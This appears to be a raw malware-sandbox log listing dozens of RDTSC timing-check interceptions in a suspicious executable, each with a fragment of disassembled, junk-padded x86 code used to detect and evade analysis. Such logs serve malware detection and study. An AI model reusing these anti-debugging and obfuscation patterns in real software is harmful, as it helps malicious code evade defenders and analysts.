                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB7E second address: C7CBA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074D9F9F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CBA2 second address: C7CBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CBA6 second address: C7CBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CBAC second address: C7CBB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CC5F second address: C7CC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CC65 second address: C7CCCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F6074F511F8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F6074F511F8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F6074F511FDh 0x00000030 mov cx, ax 0x00000033 pop edx 0x00000034 jmp 00007F6074F511FBh 0x00000039 push 00000000h 0x0000003b js 00007F6074F511FBh 0x00000041 adc di, CA22h 0x00000046 push E92BBBB9h 0x0000004b push esi 0x0000004c pushad 0x0000004d push esi 0x0000004e pop esi 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CCCA second address: C7CD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 add dword ptr [esp], 16D444C7h 0x0000000d or dword ptr [ebp+122D1C92h], ecx 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F6074D9F9E8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1AF1h], ebx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D2A50h] 0x0000003d push 00000003h 0x0000003f clc 0x00000040 push A5FCD912h 0x00000045 pushad 0x00000046 jmp 00007F6074D9F9F4h 0x0000004b pushad 0x0000004c jmp 00007F6074D9F9F3h 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD40 second address: C7CD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 1A0326EEh 0x0000000d and cl, FFFFFFE1h 0x00000010 lea ebx, dword ptr [ebp+12452AB0h] 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007F6074F511FBh 0x0000001e js 00007F6074F511F6h 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD6E second address: C7CD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE3C second address: C7CE81 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6074F511F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007F6074F511F6h 0x00000016 jmp 00007F6074F511FAh 0x0000001b popad 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007F6074F51200h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE81 second address: C7CE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE85 second address: C7CE8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CE8F second address: C7CE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D078 second address: C7D07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D07D second address: C7D083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D083 second address: C7D087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B84E second address: C9B859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6074D9F9E6h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B859 second address: C9B8BC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6074F511FAh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F6074F51208h 0x00000010 jmp 00007F6074F51209h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a js 00007F6074F51243h 0x00000020 jmp 00007F6074F51204h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9B8BC second address: C9B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074D9F9F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BA37 second address: C9BA3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BA3D second address: C9BA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BB91 second address: C9BBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074F511FAh 0x00000009 jnp 00007F6074F511F6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jbe 00007F6074F511F6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9BF8B second address: C9BFA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6074D9F9F3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C0E1 second address: C9C0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C0EC second address: C9C0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C38E second address: C9C398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C398 second address: C9C3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6074D9F9E6h 0x0000000a jmp 00007F6074D9F9EFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C4ED second address: C9C506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F51205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C506 second address: C9C511 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F6074D9F9E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93211 second address: C9322A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F6074F511F6h 0x0000000c popad 0x0000000d jo 00007F6074F511FCh 0x00000013 je 00007F6074F511F6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70803 second address: C70807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70807 second address: C7080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CD56 second address: C9CD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CEA4 second address: C9CED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6074F51200h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F6074F511FAh 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 jp 00007F6074F511F8h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D002 second address: C9D006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D197 second address: C9D1AB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6074F511FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D47C second address: C9D480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA03BF second address: CA03C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA03C5 second address: CA03D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F6074D9F9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA03D1 second address: CA03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F6074F511F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75901 second address: C75907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75907 second address: C7590B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7590B second address: C7590F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7590F second address: C75915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75915 second address: C75925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6074D9F9EAh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75925 second address: C7592E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7592E second address: C75934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6859 second address: CA6885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b jmp 00007F6074F51200h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push edx 0x00000015 jnp 00007F6074F511F6h 0x0000001b pop edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA709 second address: CAA711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA711 second address: CAA719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA719 second address: CAA71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA71E second address: CAA72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F6074F511F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA88E second address: CAA893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA893 second address: CAA8A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F511FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAA8A4 second address: CAA8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAACC7 second address: CAACD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAACD1 second address: CAAD00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6074D9F9F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6074D9F9F2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAAD00 second address: CAAD29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6074F51207h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F6074F511FBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABE56 second address: CABE78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6074D9F9F5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABE78 second address: CABE86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6074F511FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC4A9 second address: CAC4E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6074D9F9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6074D9F9EDh 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 mov dword ptr [ebp+122D1A56h], ebx 0x00000018 pop edi 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6074D9F9F8h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC64A second address: CAC64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC64E second address: CAC658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACA1B second address: CACA25 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6074F511F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD9CF second address: CAD9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD7ED second address: CAD7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD9D4 second address: CAD9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB13F8 second address: CB1404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6074F511FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1404 second address: CB140F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF201 second address: CAF20B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF20B second address: CAF218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB2959 second address: CB295D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB31B3 second address: CB31B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB31B8 second address: CB31C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB31C2 second address: CB31C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3CEF second address: CB3CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3CF5 second address: CB3CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3CF9 second address: CB3D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7942 second address: CB794B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8809 second address: CB8816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB966 second address: CBB9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6074D9F9F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F6074D9F9EDh 0x00000013 nop 0x00000014 push eax 0x00000015 jmp 00007F6074D9F9EAh 0x0000001a pop edi 0x0000001b pushad 0x0000001c mov si, di 0x0000001f mov di, bx 0x00000022 popad 0x00000023 push 00000000h 0x00000025 mov di, bx 0x00000028 jg 00007F6074D9F9F2h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1BFBh], edi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push esi 0x0000003a jmp 00007F6074D9F9F5h 0x0000003f pop esi 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAB60 second address: CBAB64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB9E2 second address: CBB9E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAB64 second address: CBAB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F6074F511F8h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB9E7 second address: CBB9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBB11 second address: CBBB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6074F511F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBB1B second address: CBBB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBB1F second address: CBBBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F6074F511F8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov bx, 59B2h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 je 00007F6074F51201h 0x00000036 jmp 00007F6074F511FBh 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007F6074F511F8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c jmp 00007F6074F51209h 0x00000061 mov eax, dword ptr [ebp+122D0A59h] 0x00000067 mov ebx, dword ptr [ebp+124756A7h] 0x0000006d mov edi, esi 0x0000006f push FFFFFFFFh 0x00000071 push ebx 0x00000072 mov edi, esi 0x00000074 pop edi 0x00000075 sub dword ptr [ebp+122D1C5Bh], ecx 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F6074F511FEh 0x00000083 rdtsc
